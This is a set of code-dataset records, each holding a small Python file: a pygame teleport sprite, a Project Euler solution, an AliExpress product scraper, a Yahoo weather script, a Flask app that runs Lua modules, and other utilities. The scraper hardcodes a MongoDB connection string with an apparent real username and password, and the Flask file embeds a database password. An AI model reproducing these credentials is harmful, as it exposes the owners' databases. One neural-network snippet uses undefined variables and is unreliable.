h)\n\nclass teleport(pygame.sprite.Sprite):\n def __init__(self,game):\n super().__init__()\n #초기화\n self.game=game\n self.ready=False\n self.player_state=0\n\n\n #텔레포트 확인\n #한 class당 본인 sprite 하나라서 사용자 좌표 받아서 sprite 정함\n def sprite_def(self,game,player):\n #아래 빨간색\n if player.rect.x>=2500 and player.rect.x<=3000 and player.rect.y>=1100 and player.rect.y<=1500:\n self.image=pygame.image.load(\"tile/red_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=2630\n self.rect.y=1160\n\n self.ready=True\n self.player_state=1\n\n #위 빨간색\n if player.rect.x>=1900 and player.rect.x<=2200 and player.rect.y>=800 and player.rect.y<=900:\n self.image=pygame.image.load(\"tile/red_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=2000\n self.rect.y=840\n\n self.ready=True\n self.player_state=2\n\n #위 분홍색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=800 and player.rect.y<=1050:\n self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1880\n self.rect.y=850\n\n self.ready=True\n self.player_state=3\n\n #아래 분홍색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=1200 and player.rect.y<=1400:\n self.image=pygame.image.load(\"tile/pink_neon.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1680\n self.rect.y=1415\n\n self.ready=True\n self.player_state=4\n\n #지하 파란색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=1100 and player.rect.y<=1200:\n self.image=pygame.image.load(\"tile/blue_neon_down.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1680\n self.rect.y=1130\n\n self.ready=True\n self.player_state=5\n\n #위에 파란색\n if player.rect.x>=1700 and player.rect.x<=1845 and player.rect.y<=240:\n self.image=pygame.image.load(\"tile/blue_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1800\n self.rect.y=110\n\n self.ready=True\n self.player_state=6\n\n #초록색\n if player.rect.x>=2670 and player.rect.x<=3500 and player.rect.y>=500 and player.rect.y<=650:\n self.image=pygame.image.load(\"tile/green_neon.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=3400\n self.rect.y=530\n\n self.ready=True\n self.player_state=7\n\n if player.rect.x>=3280 and player.rect.x<=3450 and player.rect.y>=600 and player.rect.y<=720:\n self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=3440\n self.rect.y=690\n\n self.ready=True\n self.player_state=8\n\n if player.rect.x>=0 and player.rect.x<=70 and player.rect.y<=300 and player.rect.y>=200:\n self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=40\n self.rect.y=230\n\n self.ready=True\n self.player_state=9\n\n\n def collide_detect(self,game):\n hits=pygame.sprite.spritecollide(self,game.player_sprite,False,pygame.sprite.collide_mask)\n\n if hits:\n #아래 빨간색으로 들어가면 위 빨간색으로 나옴\n if self.player_state is 1 and game.player.direction is \"right\":\n game.player.rect.x=2010\n game.player.rect.y=840\n game.player.direction=\"left\"\n #위쪽 빨간색으로 들어가면 아래 빨간색으로 나옴\n if self.player_state is 2 and game.player.direction is \"left\":\n game.player.rect.x=2630\n game.player.rect.y=1190\n game.player.direction=\"right\"\n #위 분홍색으로 들어가면 아래 분홍색으로 나옴\n if game.background_.ispink is True and self.player_state is 3 and game.player.direction is \"right\":\n game.player.rect.x=1680\n game.player.rect.y=1400\n game.player.movy-=30\n #아래 분홍으로 들어가면 위쪽 분홍색으로 나옴\n if self.player_state is 4:\n game.player.rect.x=1860\n game.player.rect.y=850\n game.player.direction=\"left\"\n #지하 파란색으로 들어가면 위쪽 파란색으로 나옴\n if self.player_state is 5:\n game.player.rect.x=1795\n game.player.rect.y=110\n game.player.direction=\"left\"\n #위쪽 파란색으로 들어가면 지하 파란색으로 나옴\n if self.player_state is 6 and game.player.direction is \"right\":\n game.player.rect.x=1680\n game.player.rect.y=1135\n game.player.movy+=30\n if self.player_state is 7:\n game.player.movy-=27\n if self.player_state is 8 and game.player.direction is \"right\":\n game.player.rect.x=40\n game.player.rect.y=230\n game.player.direction=\"right\"\n if self.player_state is 9 and game.player.direction is \"left\":\n game.player.rect.x=3440\n game.player.rect.y=695\n game.player.direction=\"left\"\n\n\nclass box(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n #초기화\n\n self.image=pygame.image.load(\"tile/platform_tile_023.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1880\n self.rect.y=960\n\n def collide_detect(self,game,background):\n hits=pygame.sprite.spritecollide(self,game.player_sprite,False,pygame.sprite.collide_mask)\n if hits:\n background.ispink=True\n","sub_path":"teleport.py","file_name":"teleport.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83509798","text":"# -*- coding: utf-8 -*-\n\nimport operator\nimport functools\n\nfrom projecteuler import mymaths\n\n\ndef rad(n):\n if n == 1:\n return 1\n else:\n return functools.reduce(operator.mul, mymaths.numdivsprimes(n), 1)\n\n\ndef result():\n LIMITE = 100000\n E_NUMERO = 10000\n tupla = []\n radlist = []\n for n in range(1, LIMITE + 1):\n # if n % 1000 == 0:\n # print n\n rd = rad(n)\n tupla.append(n)\n tupla.append(rd)\n radlist.append(tupla)\n tupla = []\n\n radlist.sort(key=operator.itemgetter(1))\n # print \"Resultado para 0124: \", radlist[E_NUMERO - 1][0]\n return radlist[E_NUMERO - 1][0]\n","sub_path":"projecteuler/problems/d0100/p0124/r0124.py","file_name":"r0124.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224718593","text":"import os\n\n\ndef go_in_folder(path_to_go, file_count, file_size):\n for i_elem in os.listdir(path_to_go):\n if os.path.isfile(os.path.join(path_to_go, i_elem)):\n file_count += 1\n file_size += os.path.getsize(os.path.join(path_to_go, i_elem))\n\n elif os.path.isdir(os.path.join(path_to_go, i_elem)):\n file_count, file_size = go_in_folder(os.path.join(path_to_go, i_elem), file_count, file_size)\n return file_count, file_size\n\n\npath_to_folder = '/Users/aguseva/PycharmProjects/iurii_alekhin/Module22'\nsumm, size = go_in_folder(path_to_folder, 0, 0)\n\nprint('Количество файлов:', summ, ' Размер, байт:', size)\n\n# зачёт! 🚀\n","sub_path":"Module22/04_files_and_folders/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"355121695","text":"import logging\nimport sys\n\nfrom optparse import make_option, OptionParser\n\nlogging.basicConfig(level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseCommand(object):\n option_list = (\n make_option(\n '-v', '--verbosity', action='store', dest='verbosity', default='1',\n type='choice', choices=['0', '1', '2', '3'],\n help='Verbosity level; 0=minimal output, 1=normal output, 2=verbose output, 3=very verbose output'\n ),\n make_option(\n '--aws_access_key_id', action='store', dest='aws_access_key_id', default=None,\n help='The aws access key id so that we can retrieve jobs from sqs'\n ),\n make_option(\n '--aws_secret_access_key', action='store', dest='aws_secret_access_key',\n default=None,\n help='The aws secret access key so that we can retrieve jobs from sqs'\n ),\n make_option(\n '--queue', action='store', dest='queue', default='pysqes',\n help=\"The name of the SQS queue. The default is pysqes.\"\n ),\n make_option(\n '--config', action='store', dest='config', default=None,\n help=\"The path to the pysqes config module.\"\n ),\n make_option(\n '--configpath', action='store', dest='configpath', default=None,\n help=\"The directory path to the pysqes config module. If your config module is not in the PYTHONPATH, then set this option so that it can be appended to sys.path\"\n )\n )\n prog_name = \"pysqes\"\n help = \"\"\n args = \"\"\n\n def usage(self, subcommand):\n usage = '%prog {0} [options] {1}'.format(subcommand, self.args)\n if self.help:\n return '{0}\\n\\n{1}'.format(usage, self.help)\n else:\n return usage\n\n def run_from_argv(self, argv):\n if len(argv) < 2:\n logger.debug(\"You need to specify a command\")\n raise Exception(\"Not enough arguments, missing pysqes command\")\n\n self.execute(argv[0], argv[1])\n\n def run_from_commandline(self, argv):\n argv = sys.argv if argv is None else argv\n logger.info(\"Running with arguments {0}\".format(argv))\n return self.run_from_argv(argv)\n\n def get_parser(self, prog_name, subcommand):\n return OptionParser(\n prog=prog_name,\n usage=self.usage(subcommand),\n option_list=self.option_list\n )\n\n def handle(self):\n raise NotImplementedError('Command subclasses should implement this method')\n","sub_path":"pysqes/bin/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"555486676","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\nimport time\nimport sys\nimport copy\nimport json\nimport os\nimport pymongo\nimport datetime\n\n\n\n\n## Things to find\nproduct_id = 1\nproduct_name = 1\ncategory = 0\nrating = 0\nlast_purchase_date = 0\nlast_page_reached = 0\nnum_transactions = 1\ntransaction_list = 0\ndate_scraped = 0 \ntopratedratedsellerboolean = 0\notherrating = 0\npriceofitem = 0\n\n\n#GLOBAL VARIABLES\n#URL_NUMBER = 32995028266\n#URL_NUMBER = 32995023560\n#URL_NUMBER = 32995023311\n#URL_NUMBER = 32995023387\n#EDGE_CASE_URL = 32995023387\n\nMinimumNumberOFOrders = 50\n\nlower_range = int(sys.argv[1])\nupper_range = int(sys.argv[2])\n\n\ndef getRating():\n ratingIndex = feedbackSoup.find('
')\n\tendtitleIndex = page_soup.find('')\n\n\tproductNameReturn = page_soup[numTitleIndex+7:endtitleIndex] \n\t#print(page_soup )\n\treturn productNameReturn\n\n\n\nfor URL_NUMBER in range(lower_range, upper_range):\n \n #print(\"Now going though product: \" +str(URL_NUMBER))\n ################################ Make feedback Soup ############################# START\n start_time = time.time()\n\n\n feedbackURL = 'https://feedback.aliexpress.com/display/productEvaluation.htm?productId='+ str(URL_NUMBER) +'&ownerMemberId=2&type=default&page=1'\n try:\n uClient = uReq(feedbackURL)\n feedbackHTML = uClient.read()\n uClient.close()\n except:\n \tcontinue\n #print(\"this is not good Bad feedback\")\n #continue\n\n feedbackSoup = str(soup(feedbackHTML, \"html.parser\"))\n\n #print(\"feedback page took: %s seconds ---\" % (time.time() - start_time))\n ################################################################################# END\n\n\n\n \n\n ################################ Make Regular Soup ############################# START\n start_time = time.time()\n\n\n url ='https://www.aliexpress.com/item/' + str(URL_NUMBER) +'.html'\n try:\n uClient = uReq(url)\n page_html = uClient.read()\n uClient.close()\n except:\n \tcontinue\n #print(\"this is not good bad Regular URL\")\n \n \n page_soup = str(soup(page_html, \"html.parser\"))\n\n #print(\"Regular page took: %s seconds ---\" % (time.time() - start_time))\n ################################################################################# END\n\n\n\n\t\n pageCheck = isPageEmpty()\n if(pageCheck == -1):\n continue\n\n\n \n #page_html = makeSoup()\n\n\n ######## Find number of transactions ########\n #index = page_soup.find('tradeCount')\n #print(page_soup.find('tradeCount'))\n #print(page_soup[index+12:index+17])\n #print(page_soup.find('item-not-found-image'))\n\n print(\"\\n\")\n\n ######### Find product number ###############\n #productNameIndex = page_soup.find('\"subject\":\"')\n #print(page_soup[productNameIndex+11:index-3])\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n\n ##################### ########################\n ##################### ########################\n\n ##################### Formatted output for testing ########################\n rating = getRating()\n #print(\"Rating: \" + rating)\n productNumber = URL_NUMBER\n #print(\"Item ID Number: \"+ str(productNumber))\n numOrders = int(getNumOrders())\n #numOrders = getNumOrders()\n # print(\"Total Number of orders made: \" + numOrders)\n\n if(numOrders<=MinimumNumberOFOrders ):\n \tcontinue\n #print(\"Total Number of orders made: \" + numOrders)\n productName = getProductName()\n #print(productName)\n\n\n # Create dictionary\n dict_product_id_copy = copy.deepcopy(productNumber)\n dict_product_name_copy = copy.deepcopy(productName)\n dict_website_name = \"aliexpress\"\n #dict_category_list = copy.deepcopy(get_category())\n #dict_last_date_purchased = copy.deepcopy(date_list[-1])\n dict_rating = copy.deepcopy(rating)\n dict_date_scraped = datetime.datetime.today()\n #dict_last_page_reached = copy.deepcopy(current_page)\n dict_num_transactions_copy = copy.deepcopy(numOrders)\n #dict_date_list_copy = copy.deepcopy(date_list)\n temp_dictionary = {'product_id': dict_product_id_copy, 'product_name': dict_product_name_copy, 'rating': dict_rating, 'num_transactions': dict_num_transactions_copy, 'date_scraped': dict_date_scraped, 'website_name': dict_website_name } \n# temp_dictionary = {'product_id': dict_product_id_copy, 'product_name': dict_product_name_copy, 'category': dict_category_list, \n# \t\t\t\t\t'rating': dict_rating, 'last_purchase_date': dict_last_date_purchased, 'last_page_reached': dict_last_page_reached, \n # \t\t\t\t\t'num_transactions': dict_num_transactions_copy, 'transaction_list': dict_date_list_copy, 'date_scraped': dict_date_scraped\n# } \n #for i in temp_dictionary:\n #print(temp_dictionary[i])\n client = pymongo.MongoClient(\n \"mongodb://allan:Spring2019@firstcluster-shard-00-00-wy2qu.mongodb.net:27017,firstcluster-shard-00-01-wy2qu.mongodb.net:27017,firstcluster-shard-00-02-wy2qu.mongodb.net:27017/test?ssl=true&replicaSet=FirstCluster-shard-0&authSource=admin&retryWrites=true\")\n db = client['test']\n collection_products = db['products']\n query = {'product_id': dict_product_id_copy}\n new_value = {\"$set\": temp_dictionary}\n\n collection_products.update_one(query, new_value, upsert=True)\n #if(collection_products.update_one(query, new_value, upsert=True)):\n #print(\"update_one\")\n\n client.close()\n\n\n # Create URL\n # url = 'https://feedback.aliexpress.com/display/evaluationProductDetailAjaxService.htm?callback=jQuery&productId=' + str(4000591272216) + '&type=default&page=1'\n #url ='https://www.aliexpress.com/item/32995023311.html'\n\n # Make soup as a str so that it can easily be converted to json\n #supper = soup(page_html, \"html.parser\")\n\n #\n #print(url)\n\n\n #mydivs = supper.findAll(\"script\", {\"class\": \"product-reviewer\"})\n #print(str(mydivs))\n #print(mydivs)\n\n","sub_path":"AliExpress/AliScraper.py","file_name":"AliScraper.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263916074","text":"\"\"\"\nCode for assisting in viewing the results.\n\"\"\"\n\nimport matplotlib.pyplot\nimport matplotlib.cm\nimport numpy as np\nimport torch\nimport torchvision.utils\nimport scipy.misc\n\n\nmatplotlib.pyplot.switch_backend('Agg')\n\n\ndef convert_density_maps_to_heatmaps(label, predicted_label):\n \"\"\"\n Converts a label and predicted label density map into their respective heatmap images.\n\n :param label: The label tensor.\n :type label: torch.autograd.Variable\n :param predicted_label: The predicted labels tensor.\n :type predicted_label: torch.autograd.Variable\n :return: The heatmap label tensor and heatmap predicted label tensor.\n :rtype: (torch.autograd.Variable, torch.autograd.Variable)\n \"\"\"\n mappable = matplotlib.cm.ScalarMappable(cmap='inferno')\n label_array = label.numpy()\n predicted_label_array = predicted_label.numpy()\n mappable.set_clim(vmin=min(label_array.min(), predicted_label_array.min()),\n vmax=max(label_array.max(), predicted_label_array.max()))\n resized_label_array = scipy.misc.imresize(label_array, (72, 72), mode='F')\n label_heatmap_array = mappable.to_rgba(resized_label_array).astype(np.float32)\n label_heatmap_tensor = torch.from_numpy(label_heatmap_array[:, :, :3].transpose((2, 0, 1)))\n resized_predicted_label_array = scipy.misc.imresize(predicted_label_array, (72, 72), mode='F')\n predicted_label_heatmap_array = mappable.to_rgba(resized_predicted_label_array).astype(np.float32)\n predicted_label_heatmap_tensor = torch.from_numpy(predicted_label_heatmap_array[:, :, :3].transpose((2, 0, 1)))\n return label_heatmap_tensor, predicted_label_heatmap_tensor\n\n\ndef create_crowd_images_comparison_grid(images, labels, predicted_labels, number_of_images=3):\n \"\"\"\n Creates a grid of images from the original images, the true labels, and the predicted labels.\n\n :param images: The original RGB images.\n :type images: torch.autograd.Variable\n :param labels: The labels.\n :type labels: torch.autograd.Variable\n :param predicted_labels: The predicted labels.\n :type predicted_labels: torch.autograd.Variable\n :param number_of_images: The number of (original) images to include in the grid.\n :type number_of_images: int\n :return: The image of the grid of images.\n :rtype: np.ndarray\n \"\"\"\n grid_image_list = []\n for index in range(min(number_of_images, images.size()[0])):\n grid_image_list.append((images[index].data + 1) / 2)\n label_heatmap, predicted_label_heatmap = convert_density_maps_to_heatmaps(labels[index].data,\n predicted_labels[index].data)\n grid_image_list.append(label_heatmap)\n grid_image_list.append(predicted_label_heatmap)\n return torchvision.utils.make_grid(grid_image_list, nrow=number_of_images)\n","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149140007","text":"class ResidueTypes:\n\tdef __init__(self, inputLetterCode, input3letterCode, inputName):\n\t\tself.letterCode = inputLetterCode\n\t\tself.letterCode3 = input3letterCode\n\t\tself.name = inputName\n\nglobal residueTypes\nresidueTypes = {}\n\nresidueTypes[\"ALANINE\"] = ResidueTypes(\"A\", \"ala\", \"alanine\")\nresidueTypes[\"ARGININE\"] = ResidueTypes(\"R\", \"arg\", \"arginine\")\nresidueTypes[\"ASPARAGINE\"] = ResidueTypes(\"N\", \"asn\", \"asparagine\")\nresidueTypes[\"ASPARTATE\"] = ResidueTypes(\"D\", \"asp\", \"aspartate\")\nresidueTypes[\"CYSTEINE\"] = ResidueTypes(\"C\", \"cys\", \"cysteine\")\nresidueTypes[\"GLUTAMINE\"] = ResidueTypes(\"Q\", \"gln\", \"glutamine\")\nresidueTypes[\"GLUTAMATE\"] = ResidueTypes(\"E\", \"glu\", \"glutamate\")\nresidueTypes[\"GLYCINE\"] = ResidueTypes(\"G\", \"gly\", \"glycine\")\nresidueTypes[\"HISTIDINE\"] = ResidueTypes(\"H\", \"his\", \"histidine\")\nresidueTypes[\"ISOLEUCINE\"] = ResidueTypes(\"I\", \"ile\", \"isoleucine\")\nresidueTypes[\"LEUCINE\"] = ResidueTypes(\"L\", \"leu\", \"leucine\")\nresidueTypes[\"LYSINE\"] = ResidueTypes(\"K\", \"lys\", \"lysine\")\nresidueTypes[\"METHIONINE\"] = ResidueTypes(\"M\", \"met\", \"methionine\")\nresidueTypes[\"PHENYLALANINE\"] = ResidueTypes(\"F\", \"phe\", \"phenylalanine\")\nresidueTypes[\"PROLINE\"] = ResidueTypes(\"P\", \"pro\", \"proline\")\nresidueTypes[\"SERINE\"] = ResidueTypes(\"S\", \"ser\", \"serine\")\nresidueTypes[\"THREONINE\"] = ResidueTypes(\"T\", \"thr\", \"threonine\")\nresidueTypes[\"TRYPTOPHAN\"] = ResidueTypes(\"W\", \"trp\", \"tryptophan\")\nresidueTypes[\"TYROSINE\"] = ResidueTypes(\"Y\", \"tyr\", \"tyrosine\")\nresidueTypes[\"VALINE\"] = ResidueTypes(\"V\", \"val\", \"valine\")","sub_path":"example/ResidueTypes.py","file_name":"ResidueTypes.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55162392","text":"from django.conf.urls import url\nfrom .views import pause_activity, start_activity, education_dell, curses_dell, \\\n ranks_dell, TrainersListView, TrainerDetailView, TrainersByDirectionListView\n\napp_name = 'trainers'\nurlpatterns = [\n url(r'^pause/$', pause_activity, name='pause_activity'),# used without temlate (for view)\n url(r'^start/$', start_activity, name='start_activity'),# used without temlate (for view)\n url(r'^education_dell/$', education_dell, name='education_dell'),# used without temlate (for view)\n url(r'^curses_dell/$', curses_dell, name='curses_dell'),# used without temlate (for view)\n url(r'^cranks_dell/$', ranks_dell, name='ranks_dell'),# used without temlate (for view)\n url(r'^person/(?P[-\\w]+)/$', TrainerDetailView.as_view(), name='viewperson'),\n url(r'^(?P[-\\w]+)/$', TrainersListView.as_view(), name='viewtrainers'),\n url(r'^(?P[-\\w]+)/(?P[-\\w]+)/$', TrainersByDirectionListView.as_view(), name='viewdirect'),\n \n]\n","sub_path":"trainers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151302950","text":"import json\nimport urllib\nimport time\n\ntry:\n import urllib.request as urllib2\nexcept ImportError:\n import urllib2\n\napp_id = \"YOUR_API_KEY\"\nbase_weather_url = \"https://query.yahooapis.com/v1/public/yql?\"\n\nprint(\"===Welcome on PyWeatherCheck===\")\ntime.sleep(0.3)\nprint()\nprint(\"This application is made by Alvin FREY with the yahoo weather API and Python\")\ntime.sleep(0.3)\nprint(\"Be careful : You need an internet connexion for this app\")\nprint()\n\nlocation = input(\"Enter your location : \")\nunits = input(\"Enter the units for temperature : \")\n\nif units == \"c\" or units == \"celsius\" or units == \"CELSIUS\" or units == \"Celsius\":\n units = \"c\"\nelif units == \"f\" or units == \"fahrenheit\" or units == \"FAHRENHEIT\" or units == \"Fahrenheit\":\n units = \"f\"\nelse:\n print()\n print(\"Please enter a correct units (Celsius or Fahrenheit)\")\n time.sleep(1.5)\n raise SystemExit(0)\n\nbase_woeid = \"http://where.yahooapis.com/v1/places.q('\" + urllib.parse.quote_plus(\n location) + \"')?appid=\" + app_id + \"&format=json\"\nresult_woeid = urllib2.urlopen(base_woeid).read()\nresult_woeid_json = json.loads(result_woeid.decode())\n\ntry:\n woeid = (result_woeid_json['places']['place'][0]['woeid'])\nexcept KeyError:\n print()\n print(\"The city is not found\")\n time.sleep(0.5)\n raise SystemExit(0)\n\nyql_query = \"select * from weather.forecast where woeid=\" + str(woeid) + \" and u='\" + units + \"'\"\nyql_proper_url = base_weather_url + urllib.parse.urlencode({'q': yql_query}) + \"&format=json\"\n\nresult_weather = urllib2.urlopen(yql_proper_url).read()\nresult_weather_json = json.loads(result_weather.decode())\n\nprint()\nprint(\"Temperature : \" + result_weather_json['query']['results']['channel']['item']['condition']['temp'] + \" °\" + units)\nprint(\"Conditions : \" + result_weather_json['query']['results']['channel']['item']['condition']['text'])\nprint(\"Wind Speed : \" + result_weather_json['query']['results']['channel']['wind']['speed'] + \" \" + result_weather_json['query']['results']['channel']['units']['speed'])\nprint(\"Atmospheric Pressure : \" + result_weather_json['query']['results']['channel']['atmosphere']['pressure'] + \" \" + result_weather_json['query']['results']['channel']['units']['pressure'])\nprint(\"Weather for Tomorrow : \" + \"Tomorrow the weather will be \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['text'] + \" .The Temperature of Tomorrow will be between \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['high'] + \" and \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['low'] + \" °\" + units)\nprint()\ninput(\"Press Enter to exit\")\n\n\n\n\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352409437","text":"# coding=utf8\nimport torch.nn.functional as F\nimport torch\nimport torch.nn as nn\n\n###### interaction mode:\n###### same\ndef SAME(h):\n g_t = F.max_pool1d(h, h.size(2)).squeeze(2)\n # print(x.size())\n return g_t\n\n###### attend\n\ndef ATTEND(h,x):\n\n avg_pool_x = F.avg_pool2d(x.unsqueeze(1),kernel_size =(3,100),stride=1,padding=(1,0)).squeeze(3)\n avg_pool_x = avg_pool_x.permute(0,2,1)\n alpha = F.softmax(torch.matmul(torch.tanh(h),avg_pool_x),dim=1)\n sum_alpha_h = torch.sum(h*alpha,dim=2) # sum([9, 256, 32]*[9, 256, 1]=[9,256,32]) = [9, 256]\n maxpool_enc1 = F.max_pool1d(h, h.size(2)).squeeze(2) # [9, 256]\n g_t = torch.cat([maxpool_enc1,sum_alpha_h],dim=1) #[9, 512]\n return g_t\n\ng_t1 = SAME(out)\ng_t2 = ATTEND(out,emb)\nprint(g_t1.size())\nprint(g_t2.size())\n\n'''compress'''\n\ndef MLP(input_size, common_size):\n\n linear = nn.Sequential(\n nn.Linear(input_size, input_size // 2),\n nn.ReLU(inplace=True),\n nn.Linear(input_size // 2, input_size // 4),\n nn.ReLU(inplace=True),\n nn.Linear(input_size // 4, common_size)\n )\n\n def forward(self, x):\n out = self.linear(x)\n return out\n\nmlp = MLP(512,100)\ng_t = mlp.forward(g_t2)\nprint(g_t.size())","sub_path":"Interaction_Modes.py","file_name":"Interaction_Modes.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358934256","text":"import serial\nimport time\n\ndef main():\n con=serial.Serial('/dev/ttyACM0', 115200)\n print('connected.')\n while 1:\n str=con.readline() # byte code\n print (str.strip().decode('utf-8')) # decoded string\n\nif __name__ == '__main__':\n main()\n","sub_path":"get_value_by_serial.py","file_name":"get_value_by_serial.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73083833","text":"# coding=utf-8\nimport os\n# import ConfigParser\nimport settings\nimport lupa\nimport json\n\n# from werkzeug.utils import secure_filename\n\nfrom utils import mysql\n\nfrom flask import Flask\n# from flask import render_template\nfrom flask import request, render_template_string, redirect\nfrom pages.admin import admin\nfrom pages.api import api\n\napp = Flask(__name__)\n\napp.config['DEBUG'] = True\napp.config.from_object(settings)\n\nmysql.init_app(app)\n\napp.register_blueprint(admin)\napp.register_blueprint(api, url_prefix='/api')\n\nfdb_str = '''\nfunction ()\n local m = require(\"luasql.mysql\")\n local env = m.mysql()\n local cn = env:connect(\"{}\", \"{}\", \"{}\")\n return cn\nend\n'''\n\n\n@app.route(\"/\")\ndef hello():\n return redirect(\"/login\")\n\n\n@app.route(\"/html//.html\")\ndef html_file(module_name, html_file):\n if not os.path.isfile(\"modules/html/{}/{}.html\".format(module_name, html_file)):\n return \"Нет такого файла\"\n with open(\"modules/html/{}/{}.html\".format(module_name, html_file), 'r') as html_f:\n html_text = unicode(html_f.read(), 'utf-8')\n if not os.path.isfile(\"modules/html/{}/{}.lua\".format(module_name, html_file)):\n return render_template_string(html_text)\n lua = lupa.LuaRuntime()\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT id, approved, activated, has_settings FROM Module WHERE name=%s\", (module_name,))\n data = cursor.fetchone()\n if data is None or data[1] != 1 or data[2] != 1:\n return \"no module\"\n\n sandbox = lua.eval(\"{}\")\n sandbox['string'] = lua.eval(\"string\")\n sandbox['math'] = lua.eval(\"math\")\n sandbox['error'] = lua.eval(\"error\")\n sandbox['tonumber'] = lua.eval(\"tonumber\")\n sandbox['db'] = lua.eval(fdb_str.format(settings.MYSQL_DATABASE_DB, \"m{}\".format(data[0]), \"qwe123\"))()\n\n args = dict(request.args)\n sandbox['args'] = lua.table_from(args)\n\n mod_settings = {}\n if data[3] == 1:\n cursor.execute(\"SELECT name, type, value FROM Module_setting WHERE module_id=%s\", (data[0],))\n sd = cursor.fetchall()\n for row in sd:\n val = row[2]\n if row[1] == 'int':\n val = int(val)\n elif row[1] == 'boolean':\n val = True if val == \"true\" else False\n mod_settings[row[0]] = val\n if len(mod_settings) != 0:\n sandbox['settings'] = lua.table_from(mod_settings)\n\n setfenv = lua.eval(\"setfenv\")\n setfenv(0, sandbox)\n\n with open(\"modules/html/{}/{}.lua\".format(module_name, html_file), 'r') as f:\n lua_code = f.read()\n try:\n method = lua.eval(lua_code)\n except lupa.LuaSyntaxError:\n return \"lua syntax error\"\n # except:\n # return \"error occurred\"\n try:\n res = to_dict(method())\n except lupa.LuaError as e:\n return \"lua error: {}\".format(e)\n # except:\n # return \"error occurred\"\n return render_template_string(html_text, **res)\n\n\n@app.route(\"/api//\", methods=[\"POST\", \"GET\"])\ndef module_api(module_name, module_method):\n lua = lupa.LuaRuntime()\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT id, approved, activated, has_settings FROM Module WHERE name=%s\", (module_name,))\n data = cursor.fetchone()\n if data is None or data[1] != 1 or data[2] != 1:\n return \"no module\"\n if not os.path.isfile(\"lua/modules/{}/{}.lua\".format(module_name, module_method)):\n return \"no method\"\n\n sandbox = lua.eval(\"{}\")\n sandbox['string'] = lua.eval(\"string\")\n sandbox['math'] = lua.eval(\"math\")\n sandbox['error'] = 